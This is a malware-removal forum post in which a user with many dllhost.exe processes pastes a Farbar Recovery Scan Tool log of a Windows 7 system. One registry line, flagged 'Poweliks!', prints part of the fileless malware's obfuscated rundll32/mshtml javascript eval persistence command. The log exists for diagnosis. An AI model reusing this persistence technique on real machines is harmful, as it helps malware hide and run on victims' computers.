View Full Version : Many dllhost.exe *32 processes from Syswow64 folder
ascot1340
2014-10-30, 04:34
My computer has been slow and multiple dllhost.exe *32 processes are running in the task manager with properties that say they are located in the Syswow64 folder. Scans of Malwarebytes and Microsoft Security Essentials do not detect any threats. Attempts to download additional antivirus programs are met with a "Security Alert" that reads "Your current security settings do not allow this file to be downloaded." I've expended my ideas. Any help would be greatly appreciated!
Note: I attempted to download the Registry Backup, Farbar Recovery Scan Tool, and the aswMBR program as instructed in the "Before You Post" sticky, but got the same "Your current security settings do not allow this file to be downloaded" message.
Got the Registry Backup, Farbar Recovery Scan Tool, and the aswMBR program to download by resetting the security settings under Internet Options to the default level. I saved a registry backup. The Farbar and aswMBR logs are below:
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 30-10-2014
Ran by Ryan (administrator) on RYAN-PC on 30-10-2014 03:06:46
Running from C:\Users\Ryan\Desktop
Loaded Profiles: UpdatusUser & Ryan (Available profiles: UpdatusUser & Ryan)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(Nalpeiron Ltd.) C:\Windows\SysWOW64\nlssrv32.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Sentelic Corporation) C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspUip.exe
(SRS Labs, Inc.) C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel_64.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
() C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
(GARMIN Corp.) C:\Program Files (x86)\Garmin\ANT Agent\ANT Agent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(VIZIO Computer Inc.) C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\XVx.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
() C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
==================== Registry (Whitelisted) ==================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [FspUip] => C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspUip.exe [5406104 2012-05-01] (Sentelic Corporation)
HKLM\...\Run: [SRS Premium Sound HD] => C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel_64.exe [2170752 2012-05-09] (SRS Labs, Inc.)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [1020064 2012-02-13] (Atheros Commnucations)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [800416 2012-02-13] (Atheros Commnucations)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1331288 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [CDAServer] => C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe [462712 2012-03-09] ()
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291608 2012-02-26] (Intel Corporation)
HKLM-x32\...\Run: [OSD Utility] => C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\XVx.exe [7892992 2012-04-27] (VIZIO Computer Inc.)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe [40336 2014-09-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-12] (Apple Inc.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\...\Run: [ANT Agent] => C:\Program Files (x86)\Garmin\ANT Agent\ANT Agent.exe [14731776 2013-02-15] (GARMIN Corp.)
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\...\Run: [Google Update] => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2013-10-27] (Google Inc.)
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
AppInit_DLLs: C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [260928 2012-03-14] (NVIDIA Corporation)
AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [215360 2012-03-14] (NVIDIA Corporation)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.bing.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x76D36B0F2FC9CC01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll (Atheros Commnucations)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
DPF: HKLM-x32 {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos/OnlineScanner.cab
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
Tcpip\Parameters: [DhcpNameServer] 192.168.200.1
FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.59 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @videolan.org/vlc,version=2.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @talk.google.com/GoogleTalkPlugin -> C:\Users\Ryan\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin HKCU: @talk.google.com/O1DPlugin -> C:\Users\Ryan\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF Plugin HKCU: @tools.google.com/Google Update;version=3 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=9 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Ryan\AppData\Roaming\mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\Ryan\AppData\Roaming\mozilla\plugins\npo1d.dll (Google)
Chrome:
=======
==================== Services (Whitelisted) =================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [106144 2012-02-13] (Atheros Commnucations) [File not signed]
R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [1337752 2013-09-12] (ESET)
R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [128280 2012-03-28] ()
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165144 2012-03-28] (Intel Corporation)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23784 2014-08-22] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [368624 2014-08-22] (Microsoft Corporation)
R2 nlsX86cc; C:\Windows\SysWOW64\nlssrv32.exe [66560 2012-11-12] (Nalpeiron Ltd.) [File not signed]
==================== Drivers (Whitelisted) ====================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
R3 CirrusLFD; C:\Windows\System32\DRIVERS\CSLFDx64.sys [35840 2012-04-02] (Cirrus Logic)
S3 ESETOlmarikOlmascoCleaner; C:\Windows\system32\Drivers\ESETOlmarikOlmascoCleaner.sys [156360 2014-04-11] ()
S3 libusb0; C:\Windows\System32\DRIVERS\libusb0.sys [44480 2011-05-17] (http://libusb-win32.sourceforge.net)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [269008 2014-07-17] (Microsoft Corporation)
R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [125584 2014-07-17] (Microsoft Corporation)
R3 ViWDM; C:\Windows\System32\DRIVERS\ViWDM.SYS [14336 2012-03-07] (Primax Electronics Ltd.)
R3 vrvd5; C:\Windows\System32\DRIVERS\vrvd5.sys [13344 2014-04-15] (Rsupport Corporation)
==================== NetSvcs (Whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
==================== One Month Created Files and Folders ========
(If an entry is included in the fixlist, the file\folder will be moved.)
2014-10-30 03:07 - 2014-10-30 03:07 - 05192704 _____ (AVAST Software) C:\Users\Ryan\Desktop\aswMBR.exe
2014-10-30 03:06 - 2014-10-30 03:07 - 00013622 _____ () C:\Users\Ryan\Desktop\FRST.txt
2014-10-30 03:06 - 2014-10-30 03:06 - 02113536 _____ (Farbar) C:\Users\Ryan\Desktop\FRST64.exe
2014-10-30 03:02 - 2014-10-30 03:02 - 00000000 ___RD () C:\Users\Ryan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BT Devices
2014-10-30 01:51 - 2014-10-30 01:51 - 00000606 _____ () C:\Users\Ryan\Desktop\aswMBR.txt
2014-10-30 01:32 - 2014-10-30 03:06 - 00000000 ____D () C:\FRST
2014-10-30 01:30 - 2014-10-30 01:30 - 00000207 _____ () C:\Windows\tweaking.com-regbackup-RYAN-PC-Microsoft-Windows-7-Home-Premium-(64-bit).dat
2014-10-30 01:28 - 2014-10-30 01:28 - 00000000 ____D () C:\RegBackup
2014-10-30 01:27 - 2014-10-30 01:27 - 00002246 _____ () C:\Users\Public\Desktop\Tweaking.com - Registry Backup.lnk
2014-10-30 01:27 - 2014-10-30 01:27 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2014-10-30 01:27 - 2014-10-30 01:27 - 00000000 ____D () C:\Program Files (x86)\Tweaking.com
2014-10-29 19:45 - 2014-10-29 19:45 - 00000000 ____D () C:\Users\Ryan\AppData\Roaming\Mozilla
2014-10-15 16:38 - 2014-10-15 16:38 - 00272808 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2014-10-15 16:38 - 2014-10-15 16:38 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaw.exe
2014-10-15 16:38 - 2014-10-15 16:38 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\java.exe
2014-10-15 16:38 - 2014-10-15 16:38 - 00098216 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2014-10-15 16:38 - 2014-10-15 16:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2014-10-15 16:38 - 2014-10-15 16:38 - 00000000 ____D () C:\Program Files (x86)\Java
2014-10-14 20:39 - 2014-10-20 22:01 - 00000000 ____D () C:\Users\Ryan\Desktop\masque of red death
2014-10-14 16:21 - 2014-09-28 20:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-14 16:21 - 2014-07-06 22:07 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-14 16:21 - 2014-07-06 22:07 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-14 16:21 - 2014-07-06 22:06 - 05552056 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-14 16:21 - 2014-07-06 22:06 - 04120576 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-14 16:21 - 2014-07-06 22:06 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-14 16:21 - 2014-07-06 22:06 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-14 16:21 - 2014-07-06 22:06 - 00500224 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-14 16:21 - 2014-07-06 21:41 - 03975096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2014-10-14 16:21 - 2014-07-06 21:41 - 03919288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2014-10-14 16:21 - 2014-07-06 21:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll
2014-10-14 16:21 - 2014-07-06 21:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll
2014-10-14 16:21 - 2014-07-06 21:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll
2014-10-14 16:21 - 2014-06-18 18:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-14 16:21 - 2014-06-18 18:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-14 16:21 - 2014-06-18 18:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-14 16:21 - 2014-06-18 18:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-14 16:21 - 2014-06-18 18:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-14 16:21 - 2014-06-18 18:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-14 16:20 - 2014-10-09 22:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-14 16:20 - 2014-10-09 22:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-14 16:20 - 2014-10-09 22:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-14 16:20 - 2014-10-06 22:54 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-14 16:20 - 2014-10-06 22:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-14 16:20 - 2014-09-25 18:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-14 16:20 - 2014-09-25 18:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-14 16:20 - 2014-09-25 18:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-14 16:20 - 2014-09-25 18:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-14 16:20 - 2014-09-25 18:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-14 16:20 - 2014-09-25 18:31 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-14 16:20 - 2014-09-18 21:56 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-14 16:20 - 2014-09-18 21:55 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-14 16:20 - 2014-09-18 21:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-14 16:20 - 2014-09-18 21:41 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-14 16:20 - 2014-09-18 21:40 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-14 16:20 - 2014-09-18 21:39 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-14 16:20 - 2014-09-18 21:30 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-14 16:20 - 2014-09-18 21:25 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-14 16:20 - 2014-09-18 21:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-14 16:20 - 2014-09-18 21:14 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-14 16:20 - 2014-09-18 21:06 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-14 16:20 - 2014-09-18 21:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-14 16:20 - 2014-09-18 21:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-14 16:20 - 2014-09-18 20:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-14 16:20 - 2014-09-18 20:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-14 16:20 - 2014-09-18 20:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-14 16:20 - 2014-09-18 20:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-14 16:20 - 2014-09-18 20:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-10-14 16:20 - 2014-09-18 20:42 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-14 16:20 - 2014-09-18 20:42 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-14 16:20 - 2014-09-18 20:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-14 16:20 - 2014-09-18 20:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-14 16:20 - 2014-09-18 20:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-14 16:20 - 2014-09-18 20:14 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-14 16:20 - 2014-09-18 19:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-14 16:20 - 2014-08-18 23:08 - 00693176 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2014-10-14 16:20 - 2014-08-18 23:08 - 00617376 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2014-10-14 16:20 - 2014-08-18 23:05 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2014-10-14 16:20 - 2014-08-18 23:05 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2014-10-14 16:20 - 2014-07-06 22:07 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 01574400 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 01480192 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 01069056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00679424 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00631808 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00440832 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00296448 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00188416 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00082432 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00058880 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-14 16:20 - 2014-07-06 22:06 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-14 16:20 - 2014-07-06 22:06 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-14 16:20 - 2014-07-06 22:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-14 16:20 - 2014-07-06 22:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2014-10-14 16:20 - 2014-07-06 22:05 - 12625920 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-14 16:20 - 2014-07-06 22:05 - 00126464 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2014-10-14 16:20 - 2014-07-06 22:02 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-14 16:20 - 2014-07-06 21:52 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-14 16:20 - 2014-07-06 21:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2014-10-14 16:20 - 2014-07-06 21:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2014-10-14 16:20 - 2014-07-06 21:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2014-10-14 16:20 - 2014-07-06 21:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2014-10-14 16:20 - 2014-07-06 21:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll
